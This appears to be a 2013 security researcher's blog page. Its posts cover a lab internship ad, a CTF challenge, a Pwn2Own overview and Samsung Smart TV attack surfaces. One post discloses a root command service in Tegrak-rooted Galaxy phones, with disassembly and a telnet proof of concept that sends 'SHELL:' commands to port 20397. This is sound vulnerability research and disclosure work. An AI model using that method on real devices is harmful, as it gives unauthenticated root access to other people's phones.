Skip to content

GrayHash 인턴 모집 공고

Offensive research center 그레이해쉬에서 인턴을 모집합니다. 그레이해쉬는 국내 최고의 오펜시브 리서치 연구소 중 하나이며 주로 기관 및 대기업을 대상으로 보안 컨설팅을 진행하고 있습니다.

그레이해쉬에서 진행하는 대부분의 컨설팅은 소프트웨어 상에서 발생할 수 있는 보안 문제점을 찾는 것과 관련이 있으며 대상 플랫폼은 데스크탑, 모바일 디바이스, 임베디드 디바이스 등 다양합니다.

그레이해쉬는 크게 세 가지 업무를 진행하고 있습니다.

– 소스 코드 오디팅과 리버스 엔지니어링을 통한 보안 취약점 식별
– 보안 관련 시스템 개발
– 보안 교육 프레임워크 개발

또한, 구성원들은 개별적으로 프로젝트를 진행하며 본인이 관심있는 분야를 깊이 연구하고 있습니다. 대체로 유명 소프트웨어에서 제로데이 헌팅, 익스플로잇 테크닉 연구, 새로운 플랫폼에서의 보안 문제점을 발견 등을 합니다.

그레이해쉬 인턴이 될 경우, 인턴의 주요 업무는 “어플리케이션에서 보안 취약점 찾기”입니다. 인턴 기간 동안은 그레이해쉬의 “공식 업무에 거의 참여하지 않으며 대부분의 시간을 본인의 역량 강화”에 쓸 수 있습니다. 또한 주기적으로 과제를 수행하며 본인의 실력을 입증해야 합니다.

이 역할을 수행하기 위해 필수적으로 갖춰야하는 소양은 다음과 같습니다.

– 취약점 발생 원리에 대한 이해
– Memory corruption 유형의 버그에 관한 익스플로잇 기술
– 프로그래밍
– 자기관리
– 보스와의 커뮤니케이션

조금 더 자세히 설명하자면, 기본적으로 소스 코드 오디팅에 대한 이해가 있어야 합니다. 또, 다양한 플랫폼의 아키텍처를 이해하면 더욱 좋지만 Intel CPU에 대한 어셈블리를 읽을 수 있다면 충분합니다.

성실한 자세로 임할 수 있는 인턴이어야 하며 인턴 기간 중 보스와의 커뮤니케이션이 원활해야 합니다. 인턴 지원을 위해서 필요한 서류들은 다음과 같습니다.

– 이력서 (양식 자유)
– 포트폴리오 (가급적 그레이해쉬 업무와 관련된 내용 위주)
– 제출: cybermong@grayhash.com
– 이메일 제목 앞에 반드시 “[인턴지원]”을 넣어주시기 바랍니다.

기타 안내사항입니다.

– 모집 인원: 2명
– 모집 마감: 2013년 8월 31일
– 1차 서류 합격 후, 면접을 통해 채용 결정 (면접 교통비 지원)
– 1차 합격 통보일: 지원 후 1주일
– 면접 합격 통보일: 면접 후 3일

인턴 근무 조건은 다음과 같습니다.

– 재택근무
– 주기적으로 오프라인 회의 (약 1주일에 한번)
– 인턴 기간은 2개월 (평가 후 기간 연장 혹은 정규 연구원 전환)
– 인턴 급여: 월 200만원
– 회사 업무 중 얻게 된 것들은 NDA

학력/성별/나이 제한 없습니다. 열정있는 보안 인력들의 많은 지원을 바랍니다!

Advertisements

My CTF challenge for SEUCINSIDE 2013

For those who missed my challenge of SECUINSIDE CTF 2013. “angry_danbi” is here! You can download the binary.

http://115.68.24.145/secu_2013/

Short description for you. This challenge is written in Assembly and has some cute tricks for:

– anti linux based analysis tools (like gdb, objdump so on)
– anti IDA (can’t open the binary in IDA)
– anti hex-rays
– obfuscated instructions
– obfuscation to make hex-rays results dumb

Those are only for start. If you get over the hurdles, now, you need to figure out a tiny VM inside. Understanding the VM opcodes and leaking some bytes are the first goal. The next is just a stupid file API. The final goal is just a simple overflow. But you would miss something if you heavily relies on hex-rays. (Obfuscation.) So, this challenge has 3 stages.

Sounds a bit complicated but actually it was not. Because we had many challenges and we wanted that teams would solve all challenges during the competition. Finally, 4 teams greatly solved this one.

I’m planning to make a much harder challenge than this one for the finals since we may have lesser challenges. I hope teams will like it too. :) Catch up at the stage!

ARM basic reverse engineering lecture slides

I gave a lecture for a company last year about basic reverse engineering for ARM. That lecture was for people who had not experienced on RE and wanted to give a shot on ARM. I’m uploading the slides here but there are something (including errata) to be fixed. For example, I need to make a new idapython script to see what instructions are most used in ARM binaries. But it seems it’s hard to get time to do that and i don’t want to share the slides a long time later, so i’ll just post it.

Although, it’s not a perfect case, but feel free to use the slides. This has 2 parts. One is to solve a simple challenge by me and other explains a really basic concept of a packer for ARM CPU. Please keep in mind that this is only v0.1 and i’ll update it when i have a chance. I believe the URLs mentioned on the slides are still alive.

PDF_LINK (Let me know if you need a keynote file to modify and re-use it.”

Cheers.

Smart TV Security Slides

So, I gave talks at cansecwest and troopers. The slides for cansecwest is already out there but this one is slightly more updated. I’m planning to research on Smart TV more, especially, for what attackers can do after pwn a Smart TV like private radio.

Enjoy!

beist_smarttv_security

Owning Tegrak-rom-rooted mobile device phones (Galaxy and Optimus)

Tegrak(http://pspmaster.tistory.com) is a most popular rooting community for android OS in Korea. They mostly focus on Samsung Galaxy Devices but also provide customized firmwares for LG Optimus devices. As Tegrak is very known here, many korean galaxy users do rooting their phones by tegrak customized firmwares.

Tegrak installs customized firmwares on users’ mobile phones. The problem is Tegrak puts some special sauce on the devices as well. They install and run some custom binaries and one of them opens a TCP socket. Let’s see which binary is having the socket.

 

# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:7777 0.0.0.0:* LISTEN 196/sec-ril
tcp 0 0 127.0.0.1:7203 0.0.0.0:* LISTEN 196/sec-ril
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 195/rild
tcp 0 0 0.0.0.0:20397 0.0.0.0:* LISTEN 3938/tegrak_service

 

You can see the ‘tegrak_service’ process and it has a socket which is listening on TCP port 20397. Let me check out the binary path.

 

# head -n 1 /proc/3938/maps
00008000-0001a000 r-xp 00000000 00:01 1234 /tegrak/bin/tegrak_service

 

Now, it’s time to fire up IDA and open the binary. As this is a simple security issue, I’ll just go to the spots directly.

 

.text:0000C4CC sub_C4CC                                ; CODE XREF: .text:loc_167FCj
.text:0000C4CC                                         ; DATA XREF: .text:loc_167FCo ...
.text:0000C4CC
.text:0000C4CC var_4BC         = -0x4BC
.text:0000C4CC sock_fd         = -0x4B8
.text:0000C4CC var_4B4         = -0x4B4
.text:0000C4CC var_4B0         = -0x4B0
.text:0000C4CC var_4AC         = -0x4AC
.text:0000C4CC
.text:0000C4CC                 PUSH    {R4-R7,LR}
.text:0000C4CE                 LDR     R3, =(dword_1A4FC - 0xC4D8)
.text:0000C4D0                 LDR     R4, =0xFFFFFFA4
.text:0000C4D2                 LDR     R5, =0xFFFFFB54
.text:0000C4D4                 ADD     R3, PC ; dword_1A4FC
.text:0000C4D6                 LDR     R1, [R3,R4]
.text:0000C4D8                 LDR     R2, =0x4A4
.text:0000C4DA                 ADD     SP, R5
.text:0000C4DC                 LDR     R0, [R1]
.text:0000C4DE                 ADD     R2, SP
.text:0000C4E0                 STR     R0, [R2]
.text:0000C4E2                 BL      sub_BCD8
.text:0000C4E6                 MOVS    R0, #2
.text:0000C4E8                 MOVS    R1, #1
.text:0000C4EA                 MOVS    R2, #0
.text:0000C4EC                 BLX     mySocketCall
.text:0000C4F0                 MOVS    R3, R0
.text:0000C4F2                 STR     R0, [SP,#0x4C0+sock_fd]
.text:0000C4F4                 ADDS    R3, #1
.text:0000C4F6                 BNE     loc_C4FE
.text:0000C4F8                 LDR     R0, =(aSocket - 0xC4FE)
.text:0000C4FA                 ADD     R0, PC          ; "socket"
.text:0000C4FC                 B       loc_C546
.text:0000C4FE                 LDR     R4, =0x414
.text:0000C500                 MOVS    R1, #0
.text:0000C502                 MOVS    R2, #0x6E
.text:0000C504                 ADD     R4, SP
.text:0000C506                 MOVS    R0, R4
.text:0000C508                 BLX     sub_8678
.text:0000C50C                 LDR     R6, =0x484
.text:0000C50E                 LDR     R1, =(aDevSocketTegra - 0xC51C)
.text:0000C510                 LDR     R0, =0x416
.text:0000C512                 MOVS    R2, #1
.text:0000C514                 ADD     R6, SP
.text:0000C516                 STRH    R2, [R4]
.text:0000C518                 ADD     R1, PC          ; "/dev/socket/tegrak_service"
.text:0000C51A                 MOVS    R2, #0x6B
.text:0000C51C                 ADD     R0, SP
.text:0000C51E                 LDR     R7, =0xFFFFAD4F
.text:0000C520                 BL      sub_12D08
.text:0000C524                 MOVS    R1, #0
.text:0000C526                 MOVS    R2, #0x10
.text:0000C528                 MOVS    R0, R6
.text:0000C52A                 BLX     sub_8678
.text:0000C52E                 MOVS    R3, #2
.text:0000C530                 STRH    R3, [R6]
.text:0000C532                 STRH    R7, [R6,#2]
.text:0000C534                 LDR     R0, [SP,#0x4C0+sock_fd]
.text:0000C536                 MOVS    R1, R6
.text:0000C538                 MOVS    R2, #0x6E
.text:0000C53A                 BLX     myBindCall

 

The binary has no symbol, so, mySocketCall() and myBindCall() are changed by me. The port number is 20397. We should make sure that this bind function takes the port number. You look at 0x0000C51E and 0x0000C532. It moves 0xAD4F to [R6+2] which points to the port number what bind() is going to use. And 0xAD4F should be 0x4FAD, and 0x4FAD is 20397 in Decimal. We got it.

We’ll see myBindCall()

 

.text:000082C0 myBindCall                              ; CODE XREF: sub_C4CC+6Ep
.text:000082C0                 STMFD   SP!, {R4,R7}
.text:000082C4                 LDR     R7, =0x11A
.text:000082C8                 SVC     0
.text:000082CC                 LDMFD   SP!, {R4,R7}
.text:000082D0                 MOVS    R0, R0
.text:000082D4                 BXPL    LR
.text:000082D8                 B       sub_16804
.text:000082D8 ; End of function myBindCall

 

At 0x000082C4, the code sets R7 to 0x11A. We know that R7 takes a system call number on ARM and 0x11A is the bind system call number. So, it’s clear that this function is for calling the bind system call.

This program has normal behaviors that network based programs do something like socket()-bind()-accept(). And it goes to recv() and handles the user-provided buffer. The handler function is myParseUserCommand() which is changed by me as well.

 

.text:0000C5DA                 STRB    R0, [R5,R4]
.text:0000C5DC                 MOVS    R1, R5
.text:0000C5DE                 MOVS    R0, R6
.text:0000C5E0                 BL      sub_D8F4
.text:0000C5E4                 MOVS    R1, R5
.text:0000C5E6                 LDR     R0, [SP,#0x4C0+var_4BC]
.text:0000C5E8                 BL      myParseUserCommand

 

I’ll skip explaining the whole function, however, myParseUserCommand() function is very predictable. It tries to compare the user buffer (command) to values of an array and jumps to a routine if it is matched. And the array looks like

 

.data:0001A538 ; _DWORD dword_1A538[26]
.data:0001A538 dword_1A538     DCD 0, 0x17997, 1, 0x17685, 2, 0x1799E, 5, 0x179AB, 6
.data:0001A538                                         ; DATA XREF: .got:0001A4A4o
.data:0001A538                 DCD 0x179BC, 7, 0x179CE, 8, 0x179D4, 0xC, 0x179E7, 0xD
.data:0001A538                 DCD 0x179FB, 0x11, 0x1781D, 0x12, 0x17845, 0x13, 0x17A0E

 

Here you have the “address: value” pairs.

0x17997: UNKOWN
0x17685: TEGRAK_KERNEL
0x1799E: CHECK_LAGFIX
0x179AB: ENABLE_SUPERUSER
0x179BC: DISABLE_SUPERUSER
0x179CE: SHELL
0x179D4: CHECK_CACHE_LAGFIX
0x179E7: CHECK_SYSTEM_LAGFIX
0x179FB: CHECK_ONENAND_MODE
0x1781D: TEGRAK_KERNEL_SUB_VERSION
0x17845: TEGRAK_KERNEL_MODEL_NAME
0x17A0E: SYSTEM_APP_REMOVE

 

It’s obvious that you’re pop-eyed when you see “SHELL” in anywhere. You can picture that there is a routine for the “SHELL” command and it executes your command. There is a parsing code for your buffer, but, i’d skip it as it’s really simple. Let me show you PoC directly.

I’m testing on Samsung Galaxy S2 rooted by Tegrak. The mobile device has 10.0.1.17 as its ip address.

 

$ telnet 10.0.1.17 20397
Trying 10.0.1.17…
Connected to 10.0.1.17.
Escape character is ‘^]’.
TESTGOGOGO
ERROR:UNKOWN:unkown command.
SHELL:mkdir /data/local/tmp/beist_poc
OK:SHELL:mkdir /data/local/tmp/beist_poc
^]
telnet> close
Connection closed.

 

Bold-Italic-Brown color text are my input. You should put your command after “SHELL:” that you want to execute on the device. Let’s see what happens in /data/local/tmp directory.

 

# ls -al /data/local/tmp
total 10700
drwxrwx–x 5 2000 2000 4096 Feb 22 11:08 .
drwxrwx–x 4 2000 2000 4096 Jan 2 1970 ..
-rwxrwxrwx 1 0 0 439013 Jan 28 21:07 arm_rsh
drwxrwxrwx 2 0 0 4096 Feb 22 11:08 beist_poc
-rwxr-xr-x 1 0 0 1096224 Dec 11 16:56 busybox_arm
-rwxrwxrwx 1 0 0 4252764 Mar 1 2009 gdb

 

I think popping-up calc.exe would be more l33t, but, we see the “beist_poc” directory has created, anyway.

The thing is tegrak_service process is running as ‘root’ that means you can do whatever you want on the target devices. Moreover, even though I’ve tested this issue only on Samsung Galaxy S2, but, it’s very possible that it’ll be working on the latest samsung galaxy rooted by tegrak firmwares. Because I’ve not seen any report regarding to this issue.

Actually I have Galaxy S3 and Galaxy Note2, but, those are used for my research, and i won’t try to do anything that could mess them up. :) So, if you have Galaxy S3 with tegrak-rooted, please check this issue out and let us know.

By the way, I don’t think this is a backdoor by the tegrak developer. Because if the tegrak developer really wanted to make a backdoor, he’d probably take a better way as he can fully control the firmware. I guess he just didn’t expect someone like me who may try to dig something on every software. :)

Again, as tegrak is very popular in korea, there are really many people who do rooting their phones using tegrak-firmwares. This is a critical security issue and i highly recommend you delete the /tegrak/bin/tegrak_service file. This is not a solution, but, better than nothing until the tegrak developer fixes this issue.

Cheers.

 

2013 CANSECWEST PWN2OWN 소개

올해 2013 CANSECWEST에서도 PWN2OWN 행사가 열리게 되었습니다. PWN2OWN 행사는 HP에서 시작한 이벤트로 일종의 해킹 컨테스트입니다. 일반 해킹대회랑 다른 점은, 해커가 자신이 발견한 제로데이 취약점을 대회 장소에서 사용하고, 만약 성공한 경우 상금을 주는 것입니다.

2013 CANSECWEST PWN2OWN 행사는 HP와 Google이 공동으로 진행합니다. 상금 역시 무척 높아서 많은 해커와 미디어의 주목을 받고 있습니다. 대회 주최측에서 요구하는 플랫폼이 제한되어 있습니다. 다음은 HP DVLABS 공식 블로그에 올라와있는 대상 플랫폼 리스트입니다.

– Web Browser
   – Google Chrome on Windows 7 ($100,000)
   – Microsoft Internet Explorer, either
     – IE 10 on Windows 8 ($100,000), or
     – IE 9 on Windows 7 ($75,000)
   – Mozilla Firefox on Windows 7 ($60,000)
   – Apple Safari on OS X Mountain Lion ($65,000)
– Web Browser Plug-ins using Internet Explorer 9 on Windows 7
   – Adobe Reader XI ($70,000)
   – Adobe Flash ($70,000)
   – Oracle Java ($20,000)

높은 인지도를 갖고 있는 웹 브라우저들이 주요 대상입니다. 인터넷 익스플로러, 크롬, 파이어폭스, 사파리 등입니다. 또한 웹 브라우저 자체에 대한 컨테스트도 진행하지만 웹 브라우저 플러그인들도 공격 대상이라고 볼 수 있습니다. 위에 보시다시피 PDF, Flash, Java가 포함되어 있습니다. 모든 환경이 최신 업데이트가 이루어진 상태입니다.

룰은 간단합니다.

1. 참가자는 대회 등록 시 본인이 참가하길 원하는 분야의 카테고리 선정
   (복수 허용)
2. 참가자는 대회 시 30분 동안 공격 시도 가능
3. 유저 인터렉션이 최소화되어야 함
   (특정 웹 페이지를 방문하는 것 정도의 수준은 가능)
4. 코드 익스큐션이 가능해야 함 (계산기 등을 실행해야 함)

플랫폼에 따라 다음과 같은 추가적인 규칙이 있을 수 있습니다.

# 만약 공격 대상 플랫폼에 샌드박스가 적용되어 있다면, 샌드박스도 우회해야 성공 인정 (예를 들어 크롬)

크롬같이 보안이 잘 되어 있는 웹 브라우저를 공략하는 것이 쉽지 않지만, 그에 걸맞는 상금을 받으실 수 있는데 크롬의 경우 한화로 1억이 넘는 상금을 받을 수 있습니다. 상금을 받기 위해서는 공격에 사용된 취약점과 관련한 상세 리포트를 제공해야만 합니다. 당연히 본 대회에서 사용되는 취약점은 공개된 적이 없는 버그여야만 합니다.

그리고 또 부가적인 상금이 존재합니다. HP에서 운영하고 있는 취약점 보상 프로그램인 ZDI에서 대회 입상자에게는 20,000 ZDI points와 함께 참가자가 대회에서 공략한 노트북을 준다고 합니다. 20,000 ZDI points를 얻게 되면 자동으로 ZDI Silver 등급으로 격상되는데 이때 $5,000의 현금과 15% monetary bonus, 25% reward point bunus, 마지막으로 데프콘 2013에 갈 수 있는 비행기표와 등록비를 제공합니다.

물론 이러한 공식적인 행사를 통하지 않고 그레이 마켓 혹은 블랙 마켓에 제로데이를 팔 경우, 더 많은 액수를 벌 수 있는 것은 사실입니다. 그러나, 공식적인 행사에 참가함으로써 자신의 네임 밸류를 높이고 크레딧까지 확보할 수 있다는 점에서 아주 매력적이라고 할 수 있습니다. 크롬이나 익스플로러를 장악한다면 한화 107,450,000원을 받을 수 있습니다!

웹 브라우저 이외에 플러그인 프로그램에도 높은 상금이 책정되어 있습니다. PDF나 Flash는 7만 달러부터 시작합니다. 자바는 비록 상금이 낮은 수준이지만, 해외 어떤 보안 업체의 경우 자바 취약점만 10~20개 이상 보유하고 있다고 하니, 그만큼 진입 장벽도 낮다고 할 수 있으므로 도전해볼만 합니다.

입상자 순위 구분은 없기 때문에 본인의 차례에 공격을 성공하면 수상자로 인정된다고 보시면 됩니다. 물론 총 상금 제한은 있지만 50만 달러이니 아마도 상금이 부족해서 수상자 명단에서 제외될 확률은 없을 것 같습니다. 여러번의 PWN2OWN 행사가 있었지만 지금껏 한번도 상금 부족으로 수상을 못한 참가자는 없었습니다.

아직 국내에서는 PWN2OWN 입상자가 없는데 국내에도 버그 헌터들이 늘어나고 있는 것으로 알고 있습니다. 올해 2013 CANSECWEST PWN2OWN에서는 국내 입상자들에 대한 소식이 있기를 기대합니다!

Dirty note on Samsung Smart TV Security

So, I’ve been pretty busy this year. I’ve been independently working for big companies and a training program by Government (called BoB). And no need to mention having drinks both on weekdays and weekends with my buddies. Which means not much time to do researches.

Fortunately, I made this December not much busy, then I’ve started to research about Samsung Smart TV security since one month ago. Why Smart TV? Because it’s already world popular and obviously it’s going to be more popular than now.

As press says, over 54M Smart TV sold last year, and 80M Smart TV sold this year already. But we can hardly see security researches on the field (Revuln.com did a good job), so, why not? Why i choose Samsung Smart TV? Because it’s industry No.1 brand.

I bought 2 Samsung Smart TVs for research. Each is about $2,500. The model name is Samsung Smart TV ES8000 and there are a variety of models of it. My one is 46′ inch which is smallest one. But it has features as much as higher inch models, then, fair enough to dig something on.

As a quick review of the product, I’ve categorized attack surfaces of the TV. It can be

1. Samsung Apps (This is like App store of Apple)
2. Network (Internet, internal network, MiTM)
3. Physical attack
4. Broadcast signal
5. Contents (DRM)
6. Default installed apps and insecure storage

I’m still working on it but I want to mention some points. I will go first with the security architecture design of Samsung Smart TV. As you can see the guideline on Samsung Smart TV developer site (http://samsungdforum.com), you can only develop Smart TV applications within HTML/Javascript/Flash.

They don’t allow you to write native programs by languages like C or C++. Besides the performance issue, it seems acceptable. Since you can’t typically make malicious programs using Javascript/Flash as they work on like VM and you can’t use syscal directly.

And it’s known that you can’t usually use file i/o calls or something like that in Javascript. But it almost doesn’t make sense making modern programs without file i/o. Therefore, Samsung gives you APIs that you can create/modify/remove files in Javascript. Also, they give you multiple API classes that you may control camera/mic and others.

But if you look at how your application works on the TV, you’d feel bad. The Smart TV uses Linux and there is only one account, ‘root’. So, basically all processes are running as ‘root’. The problem is that all applications made by programmers also run as ‘root’. (This is a very wrong design.)

 

[‘ps’ result of the TV]

  PID USER       VSZ STAT COMMAND
    1 root      1688 S    init
    2 root         0 SW   [kthreadd]
    3 root         0 SW   [ksoftirqd/0]
    4 root         0 SW   [migration/0]
    5 root         0 SW   [migration/1]
    6 root         0 SW   [ksoftirqd/1]
    7 root         0 SW   [events/0]
    8 root         0 SW   [events/1]
    9 root         0 SW   [khelper]
   10 root         0 SW   [async/mgr]
   11 root         0 SW   [sync_supers]
   12 root         0 SW   [bdi-default]
   13 root         0 SW   [kblockd/0]
   14 root         0 SW   [kblockd/1]
   15 root         0 SW   [kmmcd]
   16 root         0 SW   [kdtvlogd]
   17 root         0 SW   [kswapd0]
   18 root         0 SW   [xfs_mru_cache]
   19 root         0 SW   [xfslogd/0]
   20 root         0 SW   [xfslogd/1]
   21 root         0 SW   [xfsdatad/0]
   22 root         0 SW   [xfsdatad/1]
   23 root         0 SW   [xfsconvertd/0]
   24 root         0 SW   [xfsconvertd/1]
   25 root         0 SW   [mmcqd]
   37 root      1692 S    -/bin/sh
   58 root      1692 S    /bin/sh /mtd_exe/rc.local
   67 root     1502m S    ./exeDSP
   88 root         0 SW   [aeMsgTask]
  149 root         0 SW   [khubd]
  247 root         0 SW   [flush-179:0]
  256 root     17692 S    /mtd_cmmlib/BT_LIB/bsa_server -all=0 -diag=0 -hci=0
  265 root         0 SW   [usbhid_resumer]
  458 root      234m S    /mtd_appdata/Runtime/bin/X -logfile /mtd_rwarea/Xlog
  579 root      486m S    /mtd_appdata/InfoLink/lib/WidgetEngine 67 51982
  657 root     16632 S    HAControl 37039 -1
  678 root         0 SW   [scsi_eh_0]
  679 root         0 SW   [usb-storage]
  709 root         0 DW   [scsi-poller]
  880 root         0 SW   [RtmpTimerTask]
  881 root         0 SW   [RtmpMlmeTask]
  882 root         0 SW   [RtmpCmdQTask]
  883 root         0 SW   [RtmpWscTask]
 1047 root      1688 S    udhcpc -i ra11n0 -t 5 -T 5 -b
 1067 root      3684 S N  /mtd_exe/Comp_LIB/UEP.b
 1075 root     10680 S    ./MainServer /mtd_rwarea/yahoo
 1079 root     10072 S    ./PDSServer
 1080 root     18656 S    ./AppUpdate com.yahoo.connectedtv.updater
 1112 root     18956 S    ./BIServer com.yahoo.connectedtv.samsungbi
 1133 root      361m T    /mtd_down/emps/empWebBrowser/bin/BrowserLauncher
 1368 root      9592 S    Download 42060 -1

 

And it seems Samsung developers try to prevent bad guys from making malicious programs. How? They put you into Sandbox. For example, you can create files but only in a specific directory. You technically can’t escape from the sandbox.

 

.text:0004BDFC ; jx_GetFullPath(char *, char *)
.text:0004BDFC                 EXPORT _Z14jx_GetFullPathPcS_
.text:0004BDFC
.text:0004BDFC var_820         = -0x820
.text:0004BDFC s               = -0x420
.text:0004BDFC ptr             = -0x20
.text:0004BDFC
.text:0004BDFC                 STMFD           SP!, {R4-R8,R11,LR}
.text:0004BE00                 ADD             R11, SP, #0x18
.text:0004BE04                 SUB             SP, SP, #0x800
.text:0004BE08                 MOV             R4, #0
.text:0004BE0C                 SUB             SP, SP, #0xC
.text:0004BE10                 MOV             R5, R0
.text:0004BE14                 MOV             R2, #0x400 ; n
.text:0004BE18                 MOV             R6, R1
.text:0004BE1C                 SUB             R0, R11, #-s ; s
.text:0004BE20                 MOV             R1, R4  ; c
.text:0004BE24                 STR             R4, [R11,#ptr]
.text:0004BE28                 BL              memset
.text:0004BE2C                 MOV             R1, R4  ; c
.text:0004BE30                 SUB             R0, R11, #-var_820 ; s
.text:0004BE34                 MOV             R2, #0x400 ; n
.text:0004BE38                 BL              memset
.text:0004BE3C                 LDRSB           R3, [R5]
.text:0004BE40                 CMP             R3, #0x2F ; /
.text:0004BE44                 BEQ             loc_4BEC0
.text:0004BE48                 CMP             R3, #0x2E ; .
.text:0004BE4C                 BEQ             loc_4BEC8
.text:0004BE50                 SUB             R8, R11, #-ptr
.text:0004BE54                 SUB             R7, R11, #-s
.text:0004BE58                 MOV             R1, R6
.text:0004BE5C                 SUB             R4, R11, #-var_820
.text:0004BE60                 MOV             R0, R8
.text:0004BE64                 BL              _Z20STR_AllocCopyDefaultPPcPKc 
.text:0004BE68                 MOV             R1, R5
.text:0004BE6C                 MOV             R0, R8
.text:0004BE70                 BL              _Z19STR_AllocCatDefaultPPcPKc 
.text:0004BE74                 MOV             R1, R7  ; resolved
.text:0004BE78                 LDR             R0, [R11,#ptr] ; name
.text:0004BE7C                 BL              realpath
.text:0004BE80                 MOV             R1, R4  ; resolved
.text:0004BE84                 MOV             R0, R6  ; name
.text:0004BE88                 BL              realpath
.text:0004BE8C                 MOV             R0, R4  ; s
.text:0004BE90                 BL              strlen
.text:0004BE94                 MOV             R1, R7
.text:0004BE98                 MOV             R2, R0
.text:0004BE9C                 MOV             R0, R4
.text:0004BEA0                 BL              _Z12STR_NcasecmpPKcS0_i 
.text:0004BEA4                 CMP             R0, #0
.text:0004BEA8                 LDR             R0, [R11,#ptr] ; ptr
.text:0004BEAC                 BNE             loc_4BEB8
.text:0004BEB0                 SUB             SP, R11, #0x18
.text:0004BEB4                 LDMFD           SP!, {R4-R8,R11,PC}
.text:0004BEB8                 CMP             R0, #0
.text:0004BEBC                 BNE             loc_4BEDC
.text:0004BEC0                 MOV             R0, #0
.text:0004BEC4                 B               loc_4BEB0
.text:0004BEC8                 LDRSB           R3, [R5,#1]
.text:0004BECC                 CMP             R3, #0x2E
.text:0004BED0                 BNE             loc_4BE50
.text:0004BED4                 MOV             R0, #0
.text:0004BED8                 B               loc_4BEB0
.text:0004BEDC                 BL              free
.text:0004BEE0                 MOV             R0, #0
.text:0004BEE4                 B               loc_4BEB0

 

– Pseoudo code is like

jx_GetFullPath(filepath, stricted_directory) {
   ...
   if not filepath starts with stricted_directory:
      exit
   ...
}

 

However, as I said before, running all processes as ‘root’ is wrong which means if there is any vulnerable API, an attacker could compromise the TV and get the most privileged account. There are many classes of API, as you guess, I’ve found many APIs vulnerable. You can get ‘root’ very easily using the vulnerabilities.

At this point, one thing i have to say is that, again, this is a wrong design even if the Samsung developers made all APIs secure. This is like “Soon or later problem”. They will anyway make more APIs and if there will be anything wrong, they are going to have bad times. They need to implement something like iOS’s MAC or android isolation policy *at least*.

So, we’ve found around 10 API vulnerabilities so far, but we’re pretty sure there will be more. But we just stopped for looking at it as there are more attack surfaces on Samsung Smart TV.

As all processes are running with ‘root’, if there is any pre-installed application and vulnerable to MiTM attack, again, an attacker can compromise the TV. Some applications are against MiTM attacks, but some are not. And some applications seem to be against MiTM attack. For example, an application does automatic update and it checks a new binary’s checksum.

But problem is we can re-generate the checksum because we have binaries and keys. I’ve seen any application using TPM like ARM TrustZone which means you easily get the keys on the machine. However, they may use ARM TrustZone when playing multi media contents. (But didn’t check this out, yet)

Next, there are many network daemons on the TV. There are over 10 TCP/UDP based programs. We’ve found some memory corruption-style bugs in some of them. Even though we’ve not managed to make working exploits, but it’s just matter of time.

Physical attack vectors are also nice for hackers. Pwning by USB sticks is being more notorious. You may see the excellent work by j00ru (http://j00ru.vexillium.org/?p=1272) before. I also did some research on that kind of bug in 2008, tho. It was crashing NTFS driver when i put a USB stick into my laptop.

You may want more range when you do physical attacks, then, IrDA based remote controller would be a nice idea. We’ve figured out that there are some hidden commands in remote controller protocols. So, we’ve been able to make the debug mode on on our TV. Also, there is still a possibility that you could find some memory-corruption style vulnerabilities while parsing data of the protocol.

Pwning by broadcast signal would be ideal as well. Samsung Smart TV provides you to upgrade the firmware with 3 ways. You can upgrade via internet, USB and broadcast signal. I’m not sure why they offered users this way, but it’s probably for people who can’t use internet. To be honest, we’ve not done any research on that part yet, but, it’s obviously fun to take a look.

DRM attacks, it may be boring for hackers. But it’s critical to TV vendors. As far as I know, if your TV platform is week against DRM attacks, the multi media providers won’t give you the contents. And of course contents business is really important in the field, so, vendors like Samsung are trying to make it secure. Unfortunately, there are already media programs, but, I hardly see them secure. The typical packet sniffing works.

Last, there are minor issues in pre-installed applications. For example, there is a Facebook app, but, it has a hard-coded secret key. I don’t know how this key is important, however, there are many insecure storage cases. For example, there are many private keys that look created by Samsung.

The TV uses ARMv7. So, we’re doing ARM reversing. While the reversing, we’ve pointed out some spots that might cause open source license issues. It’s known that there are law firms, especially in US, that are ready to sue vendors who use open source in a improper way, we want to be careful, i’ll explain about this topic after talking to Samsung.

I’ve quickly mentioned the attack surfaces so far. So, what’s the worst case if your Smart TV gets hacked? It’s probably when your TV does surveillance! ES8000 has a lot of hardware modules. There are WIFI/Bluetooth/UART/JTAG/etc and Camera/MIC!

Isn’t Camera/MIC sound scary? We’re working on a demo that our malicious program can record your motion/voice. Of course it sounds very scary, but, it would be a good demo how Smart TV should be secure. Side note: I hardly put on clothes at home.

Besides the software stuff, there are some interesting hardware-like stuff work. As I said, we found a way to make the debug mode enable on the TV, and we just put a cable into EX-LINK, now, we can see the UART messages without opening the TV box.

So, i think we’ve done 50% of this research so far. We hope this work will be done in January. Then, we’ll submit a talk to security conferences. There are my good friends who commented nice stuff to our work. Mongii of Hackerschool, Tora of Google and Donato of Revuln. Thanks to the guys and i hope i’m going to make this research done soon.

Also, I’ll put slides about Smart TV attack surfaces here. They’re presented at small and local seminars. The seminars were for introducing the attack surfaces but not detailed technical stuff. So, feel free to enjoy and please give us good ideas if you have. :) I need to stop writing before too drunk!

Slides: samsung_smart_tv_attack_surfaces